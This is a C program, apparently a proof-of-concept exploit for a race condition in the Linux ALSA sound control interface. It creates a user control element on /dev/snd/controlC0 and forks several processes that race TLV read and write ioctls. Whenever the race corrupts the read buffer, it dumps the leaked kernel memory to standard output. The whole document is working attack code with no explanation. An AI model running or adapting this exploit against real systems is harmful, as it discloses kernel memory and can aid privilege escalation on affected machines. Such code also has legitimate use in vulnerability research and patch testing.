#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sound/asound.h>
#include <stdio.h>
#include <string.h>

static void tlv_write(int fd, unsigned int numid)
{
	struct snd_ctl_tlv *tlv_a, *tlv_b;
	int ret;

	tlv_a = malloc(sizeof(*tlv_a) + 1024 * 128);
	tlv_a->numid = numid;
	tlv_a->length = 1024 * 128;
	memset(tlv_a->tlv, 0xaa, tlv_a->length);

	tlv_b = malloc(sizeof(*tlv_b) + 1024 * 128);
	tlv_b->numid = numid;
	tlv_b->length = 1024 * 128 / 2;
	memset(tlv_b->tlv, 0x00, tlv_b->length);

	while (1) {
		ret = ioctl(fd, SNDRV_CTL_IOCTL_TLV_WRITE, tlv_a);
		if (ret)
			perror("tlv_a");
		tlv_b->tlv[1] = tlv_b->length / 4; 
		ret = ioctl(fd, SNDRV_CTL_IOCTL_TLV_WRITE, tlv_b);
		if (ret)
			perror("tlv_b");
		if (tlv_b->length >= 1024 * 128 / 2)
			tlv_b->length = 64;
		else
			tlv_b->length *= 2;
	}
}

static void tlv_read(int fd, unsigned int numid)
{
	struct snd_ctl_tlv *tlv;
	unsigned int offset;
	int ret;

	tlv = malloc(sizeof(*tlv) + 1024 * 128);

	tlv->numid = numid;
	tlv->length = 1024 * 128;

	while (1) {
		memset(tlv->tlv, 0x00, tlv->length);
		tlv->tlv[1024 * 128 / 4 - 1] = 0x23422342;
		ret = ioctl(fd, SNDRV_CTL_IOCTL_TLV_READ, tlv);
		if (ret == -1)
			perror("tlv_read");

		if (tlv->tlv[1024 * 128 / 4 -1] != 0x23422342 && tlv->tlv[0] != 0xaaaaaaaa) {
			offset = tlv->tlv[1];
			if (offset > 0x4000) {
				offset = 0x4000;
				printf("offset\n");
			}
			write(1, &tlv->tlv[offset], (0x8000 - offset) * 4);
//			fprintf(stderr, "bing\n");
		}
	}
}

int main(void)
{
	int fd;
	int ret;
	struct snd_ctl_elem_info info = {};
	struct snd_ctl_tlv *tlv;
	int i;

	fd = open("/dev/snd/controlC0", 0);
	if (fd == -1) {
		perror("");
		exit(1);
	}

	memset(&info, 0x00, sizeof(info));
	info.type = SNDRV_CTL_ELEM_TYPE_BOOLEAN;
	info.count = 1;
	info.owner = 1;
	info.access = SNDRV_CTL_ELEM_ACCESS_READWRITE |
		SNDRV_CTL_ELEM_ACCESS_TLV_READWRITE;
	strcpy(info.id.name, "Test Switch");

	ioctl(fd, SNDRV_CTL_IOCTL_ELEM_REMOVE, &info);

	ret = ioctl(fd, SNDRV_CTL_IOCTL_ELEM_ADD, &info);
	if (ret == -1) {
		perror("add");
		exit(1);
	}

	ret = ioctl(fd, SNDRV_CTL_IOCTL_ELEM_INFO, &info);
	if (ret == -1) {
		perror("info");
		exit(1);
	}

	tlv = malloc(sizeof(*tlv) + 1024 * 128);

	tlv->numid = info.id.numid;
	tlv->length = 8;

	ret = ioctl(fd, SNDRV_CTL_IOCTL_TLV_WRITE, tlv);
	if (ret == -1) {
		perror("tlv write");
		exit(1);
	}

	tlv->length = 1024 * 128;

	ret = ioctl(fd, SNDRV_CTL_IOCTL_TLV_READ, tlv);
	if (ret == -1) {
		perror("tlv read");
		exit(1);
	}

	fprintf(stderr, "OK\n");

	for (i = 0; i < 7; i++) {
		if (fork()) {
			tlv_read(fd, info.id.numid);
			return 0;
		}
	}
	tlv_write(fd, info.id.numid);

	return 0;
}
